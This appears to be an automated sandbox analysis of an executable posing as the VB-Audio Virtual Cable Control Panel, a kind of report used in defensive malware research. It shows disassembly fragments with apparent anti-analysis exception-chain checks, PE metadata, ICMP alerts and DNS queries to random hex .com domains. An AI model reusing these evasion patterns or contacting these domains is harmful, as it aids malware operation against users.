cmp ebx, 04h
jne 00007F2FC49C647Fh
pop edx
mov ecx, esi
mov edx, edi
mov ecx, dword ptr [ebp+00h]
mov esp, ebx
mov ebx, dword ptr [ebx]
pop ecx
popad
push eax
pushad
xor ebx, ebx
push dword ptr fs:[00000000h]
pop ebx
cmp ebx, 04h
jne 00007F2FC49C647Eh
mov ebp, esi
mov ebx, dword ptr [esi]
inc edx
mov ebx, esp
imul eax, edx
mov ecx, eax
popad
push 000013C5h
pushad
xor ebx, ebx
push dword ptr fs:[00000000h]
pop ebx
cmp ebx, 04h
jne 00007F2FC49C6482h
mov edi, eax
dec edx
mov ebx, esi
call edi
mov edi, ecx
dec ebx
push ebx
test eax, eax
call edi
pop ecx
popad
push 00404779h
pushad
xor ebx, ebx
push dword ptr fs:[00000000h]
pop ebx
cmp ebx, 04h
jne 00007F2FC49C647Bh

Rich Headers

Programming Language:

[C++] VS98 (6.0) SP6 build 8804
[EXP] VC++ 6.0 SP5 build 8804
[ C ] VS98 (6.0) SP6 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb8f0	0x8c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x12000	0xc0540	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xd2000	0x1eb8
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xb000	0x1c4	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9276	0xa000	False	0.55888671875	data	6.56023629969	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0xb000	0x12dc	0x2000	False	0.28466796875	data	3.67874100082	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xd000	0x4ea4	0x4000	False	0.1611328125	data	1.88336858311	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x12000	0xc0540	0xc1000	False	0.292934595612	data	5.9441633332	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_BITMAP	0x121e0	0xbf518	data	French	France
RT_ICON	0xd16f8	0x2e8	dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 4279173368, next used block 2163736576	French	France
RT_MENU	0xd19e0	0x3d4	data	French	France
RT_GROUP_ICON	0xd1db8	0x14	data	French	France
RT_VERSION	0xd1dd0	0x3c0	data	French	France
RT_MANIFEST	0xd2190	0x3ac	XML 1.0 document, ASCII text	French	France

Imports

DLL	Import
KERNEL32.dll	FlushFileBuffers, GetStringTypeW, GetStringTypeA, SetStdHandle, LoadLibraryA, GetOEMCP, GetACP, LCMapStringW, MultiByteToWideChar, GetCPInfo, SetFilePointer, WriteFile, TlsGetValue, SetLastError, DeviceIoControl, GetTickCount, CreateFileA, GetLastError, CreateMutexA, ReleaseMutex, WaitForSingleObject, CloseHandle, GetModuleHandleA, GetProcAddress, GetCurrentProcess, LCMapStringA, GetVersionExA, TlsAlloc, TlsSetValue, GetCurrentThreadId, GetFileType, GetStdHandle, HeapFree, HeapAlloc, HeapReAlloc, GetStartupInfoA, GetCommandLineA, GetVersion, ExitProcess, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InterlockedDecrement, InterlockedIncrement, GetModuleFileNameA, GetEnvironmentVariableA, HeapDestroy, HeapCreate, VirtualFree, VirtualAlloc, RtlUnwind, TerminateProcess, UnhandledExceptionFilter, FreeEnvironmentStringsA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStrings, GetEnvironmentStringsW, SetHandleCount
USER32.dll	GetMessageA, DispatchMessageA, TranslateMessage, LoadIconA, LoadCursorA, RegisterClassA, CreateWindowExA, ShowWindow, UpdateWindow, GetSystemMetrics, SetWindowPos, SetTimer, BeginPaint, EndPaint, KillTimer, PostQuitMessage, GetDC, ReleaseDC, DefWindowProcA, MessageBoxA, DrawTextA, LoadBitmapA, PostMessageA, SystemParametersInfoA
GDI32.dll	SetBkMode, SetTextColor, Rectangle, CreateCompatibleDC, SelectObject, GetObjectA, BitBlt, DeleteDC, DeleteObject, CreateFontIndirectA, CreateBrushIndirect, GetStockObject
ADVAPI32.dll	RegOpenKeyExA, RegCreateKeyExA, RegOpenKeyA, RegCreateKeyA, RegSetValueExA, RegCloseKey
SHELL32.dll	ShellExecuteA
SETUPAPI.dll	SetupDiGetClassDevsA, SetupDiEnumDeviceInterfaces, SetupDiGetDeviceInterfaceDetailA, SetupDiDestroyDeviceInfoList

Version Infos

Description	Data
LegalCopyright	V.Burel2012-2015
InternalName	VBCABLE_ControlPanel
FileVersion	1, 0, 3, 5
CompanyName	VB-AUDIO Software
Comments	VB-AUDIO Control Panel forVB-Audio Virtual Cable
ProductName	VBCABLE_ControlPanel
ProductVersion	1, 0, 3, 5
FileDescription	VB-AUDIO Virtual Cable Control Panel
OriginalFilename	VBCABLE_ControlPanel.exe
Translation	0x0000 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
French	France

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source IP	Dest IP
04/12/21-13:03:00.758135	ICMP	384	ICMP PING	192.168.2.6	205.185.216.42
04/12/21-13:03:00.793076	ICMP	449	ICMP Time-To-Live Exceeded in Transit	84.17.52.126	192.168.2.6
04/12/21-13:03:00.794144	ICMP	384	ICMP PING	192.168.2.6	205.185.216.42
04/12/21-13:03:00.829208	ICMP	449	ICMP Time-To-Live Exceeded in Transit	5.56.20.161	192.168.2.6
04/12/21-13:03:00.829596	ICMP	384	ICMP PING	192.168.2.6	205.185.216.42
04/12/21-13:03:00.877257	ICMP	449	ICMP Time-To-Live Exceeded in Transit	81.95.2.138	192.168.2.6
04/12/21-13:03:00.878848	ICMP	384	ICMP PING	192.168.2.6	205.185.216.42
04/12/21-13:03:00.931631	ICMP	449	ICMP Time-To-Live Exceeded in Transit	151.139.80.6	192.168.2.6
04/12/21-13:03:00.932046	ICMP	384	ICMP PING	192.168.2.6	205.185.216.42
04/12/21-13:03:00.981732	ICMP	449	ICMP Time-To-Live Exceeded in Transit	151.139.80.13	192.168.2.6
04/12/21-13:03:00.982232	ICMP	384	ICMP PING	192.168.2.6	205.185.216.42
04/12/21-13:03:01.032005	ICMP	408	ICMP Echo Reply	205.185.216.42	192.168.2.6

Network Port Distribution

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 12, 2021 13:02:57.136909962 CEST	58377	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:02:57.168713093 CEST	55074	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:02:57.186321974 CEST	53	58377	8.8.8.8	192.168.2.6
Apr 12, 2021 13:02:57.229592085 CEST	53	55074	8.8.8.8	192.168.2.6
Apr 12, 2021 13:02:58.231462955 CEST	54513	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:02:58.279934883 CEST	53	54513	8.8.8.8	192.168.2.6
Apr 12, 2021 13:02:59.121067047 CEST	62044	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:02:59.170342922 CEST	53	62044	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:00.064244032 CEST	63791	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:00.114258051 CEST	53	63791	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:00.684736013 CEST	64267	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:00.697628021 CEST	49448	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:00.743732929 CEST	53	64267	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:00.756989002 CEST	53	49448	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:01.268578053 CEST	60342	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:01.328685999 CEST	53	60342	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:05.020802975 CEST	61346	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:05.085299015 CEST	53	61346	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:06.391015053 CEST	51774	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:06.439738035 CEST	53	51774	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:08.972621918 CEST	56023	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:09.021547079 CEST	53	56023	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:10.350749016 CEST	58384	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:10.402343988 CEST	53	58384	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:10.841862917 CEST	60261	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:10.990920067 CEST	53	60261	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:11.000909090 CEST	56061	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:11.073117971 CEST	53	56061	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:11.090610981 CEST	58336	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:11.268290997 CEST	53	58336	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:11.315761089 CEST	53781	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:11.393536091 CEST	53	53781	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:11.403877974 CEST	54064	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:11.477276087 CEST	53	54064	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:11.488459110 CEST	52811	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:11.564749002 CEST	53	52811	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:11.574331999 CEST	55299	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:11.743356943 CEST	53	55299	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:11.784915924 CEST	63745	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:11.846792936 CEST	53	63745	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:11.854188919 CEST	50055	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:11.930025101 CEST	53	50055	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:12.094336033 CEST	61374	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:12.271042109 CEST	53	61374	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:12.291918039 CEST	50339	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:12.363723040 CEST	53	50339	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:12.409718990 CEST	63307	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:12.481281996 CEST	53	63307	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:12.523664951 CEST	49694	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:12.605267048 CEST	53	49694	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:12.703941107 CEST	54982	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:12.790227890 CEST	53	54982	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:13.030762911 CEST	50010	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:13.091034889 CEST	53	50010	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:13.098697901 CEST	63718	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:13.155849934 CEST	53	63718	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:13.222284079 CEST	62116	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:13.273886919 CEST	53	62116	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:13.318120003 CEST	63816	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:13.375595093 CEST	53	63816	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:13.383250952 CEST	55014	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:13.460635900 CEST	53	55014	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:13.533027887 CEST	62208	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:13.595036983 CEST	53	62208	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:13.715596914 CEST	57574	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:13.804666042 CEST	53	57574	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:16.543703079 CEST	51818	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:16.693510056 CEST	53	51818	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:18.883424997 CEST	56628	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:18.962938070 CEST	53	56628	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:19.032450914 CEST	60778	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:19.094701052 CEST	53	60778	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:19.206955910 CEST	53799	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:19.283121109 CEST	53	53799	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:19.479945898 CEST	54683	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:19.540427923 CEST	53	54683	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:19.980892897 CEST	59329	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:20.052783966 CEST	53	59329	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:20.232626915 CEST	64021	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:20.292437077 CEST	53	64021	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:23.479829073 CEST	56129	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:23.554173946 CEST	53	56129	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:23.647763968 CEST	58177	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:23.707184076 CEST	53	58177	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:23.815805912 CEST	50700	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:23.892177105 CEST	53	50700	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:24.043111086 CEST	54069	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:24.118012905 CEST	53	54069	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:24.147711992 CEST	61178	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:24.224461079 CEST	53	61178	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:24.250355959 CEST	57017	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:24.299501896 CEST	53	57017	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:24.318134069 CEST	56327	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:24.375478983 CEST	53	56327	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:24.914566040 CEST	50243	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:24.975122929 CEST	53	50243	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:24.982626915 CEST	62055	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:25.056853056 CEST	53	62055	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:25.092700005 CEST	61249	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:25.158602953 CEST	53	61249	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:25.204273939 CEST	65252	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:25.261189938 CEST	53	65252	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:25.313347101 CEST	64367	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:25.374986887 CEST	53	64367	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:25.433950901 CEST	55066	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:25.441267967 CEST	60211	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:25.490122080 CEST	53	60211	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:25.491230011 CEST	53	55066	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:25.519424915 CEST	56570	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:25.580974102 CEST	53	56570	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:26.881007910 CEST	58454	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:26.934349060 CEST	53	58454	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:27.067282915 CEST	55180	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:27.127104044 CEST	53	55180	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:27.132898092 CEST	58721	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:27.195290089 CEST	53	58721	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:27.202928066 CEST	57691	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:27.259983063 CEST	53	57691	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:27.271294117 CEST	52943	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:27.328454971 CEST	53	52943	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:27.350861073 CEST	59489	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:27.412911892 CEST	53	59489	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:27.464390993 CEST	64022	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:27.523794889 CEST	53	64022	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:27.632875919 CEST	60023	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:27.690653086 CEST	53	60023	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:28.749053955 CEST	57193	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:28.797725916 CEST	53	57193	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:32.284576893 CEST	50248	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:32.341511011 CEST	53	50248	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:32.369936943 CEST	64413	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:32.427268028 CEST	53	64413	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:32.504468918 CEST	60429	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:32.594140053 CEST	53	60429	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:32.646763086 CEST	60345	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:32.695549965 CEST	53	60345	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:32.735975981 CEST	58730	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:32.796217918 CEST	53	58730	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:32.852586985 CEST	53830	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:32.914777040 CEST	53	53830	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:32.921643972 CEST	57226	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:32.983623981 CEST	53	57226	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:33.051158905 CEST	57880	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:33.132924080 CEST	53	57880	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:33.209146976 CEST	60850	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:33.268820047 CEST	53	60850	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:33.280750990 CEST	53187	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:33.342984915 CEST	53	53187	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:33.349498987 CEST	55830	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:33.406709909 CEST	53	55830	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:33.413965940 CEST	55145	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:33.471174955 CEST	53	55145	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:33.546457052 CEST	64091	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:33.606036901 CEST	53	64091	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:33.614715099 CEST	55728	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:33.672085047 CEST	53	55728	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:33.688853979 CEST	55694	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:33.741935968 CEST	53	55694	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:34.764062881 CEST	53926	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:34.821358919 CEST	53	53926	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:34.864597082 CEST	65531	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:34.923144102 CEST	53	65531	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:34.929876089 CEST	65437	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:34.990014076 CEST	53	65437	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:35.022841930 CEST	54590	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:35.072877884 CEST	53	54590	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:35.098217010 CEST	51318	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:35.146889925 CEST	53	51318	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:35.189290047 CEST	60888	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:35.238033056 CEST	53	60888	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:35.269690990 CEST	58474	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:35.318413973 CEST	53	58474	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:35.344116926 CEST	64575	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:35.405577898 CEST	53	64575	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:35.434082031 CEST	59092	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:35.491296053 CEST	53	59092	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:35.502551079 CEST	57483	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:35.563404083 CEST	53	57483	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:35.589879036 CEST	53830	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:35.651603937 CEST	53	53830	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:35.691437960 CEST	49809	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:35.740143061 CEST	53	49809	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:35.762669086 CEST	52814	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:35.821461916 CEST	53	52814	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:35.846787930 CEST	51069	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:35.907021046 CEST	53	51069	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:35.937725067 CEST	56526	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:35.997915030 CEST	53	56526	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:36.026412964 CEST	50512	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:36.076736927 CEST	53	50512	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:36.083726883 CEST	51679	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:36.142843962 CEST	53	51679	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:36.184247971 CEST	56071	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:36.241729021 CEST	53	56071	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:36.275032997 CEST	58950	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:36.335172892 CEST	53	58950	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:36.374141932 CEST	57035	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:36.427563906 CEST	53	57035	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:36.464217901 CEST	54122	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:36.521550894 CEST	53	54122	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:37.616827011 CEST	56759	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:37.674016953 CEST	53	56759	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:38.746007919 CEST	59220	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:38.803534985 CEST	53	59220	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:38.832190990 CEST	62211	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:38.882491112 CEST	53	62211	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:38.893923998 CEST	62033	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:38.944262028 CEST	53	62033	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:38.976767063 CEST	61244	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:39.034123898 CEST	53	61244	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:39.041210890 CEST	53696	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:39.098603964 CEST	53	53696	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:39.142802954 CEST	50733	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:39.202089071 CEST	53	50733	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:39.209203005 CEST	55770	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:39.268301964 CEST	53	55770	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:46.100287914 CEST	54525	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:46.161859989 CEST	53	54525	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:46.262140989 CEST	61760	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:46.319459915 CEST	53	61760	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:46.396337032 CEST	63822	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:46.461436987 CEST	53	63822	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:46.502969980 CEST	50957	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:46.562191010 CEST	53	50957	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:46.643312931 CEST	59666	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:46.694890022 CEST	53	59666	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:46.723298073 CEST	52223	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:46.774851084 CEST	53	52223	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:46.800092936 CEST	60136	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:46.850354910 CEST	53	60136	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:52.673238993 CEST	55649	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:52.722090006 CEST	53	55649	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:52.845650911 CEST	51524	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:52.894337893 CEST	53	51524	8.8.8.8	192.168.2.6
Apr 12, 2021 13:03:56.430430889 CEST	59141	53	192.168.2.6	8.8.8.8
Apr 12, 2021 13:03:56.482141972 CEST	53	59141	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Apr 12, 2021 13:03:10.841862917 CEST	192.168.2.6	8.8.8.8	0xc69a	Standard query (0)	9ed2feea30c3cc5d.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:11.000909090 CEST	192.168.2.6	8.8.8.8	0x637e	Standard query (0)	55be681fc6760236.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:11.090610981 CEST	192.168.2.6	8.8.8.8	0x830a	Standard query (0)	61d53b5a4bc1ab86.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:11.315761089 CEST	192.168.2.6	8.8.8.8	0x1409	Standard query (0)	c431a802ff4a46b5.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:11.403877974 CEST	192.168.2.6	8.8.8.8	0xeac9	Standard query (0)	84b5a35d6e5335ef.com	A (IP address)	IN (0x0001)
Apr 12, 2021 13:03:11.488459110 CEST	192.168.2.6	8.8.8.8	0x6ee9	Standard query (0)	bdc347c728b2d94d.com	A (IP address)	IN (0x0001)
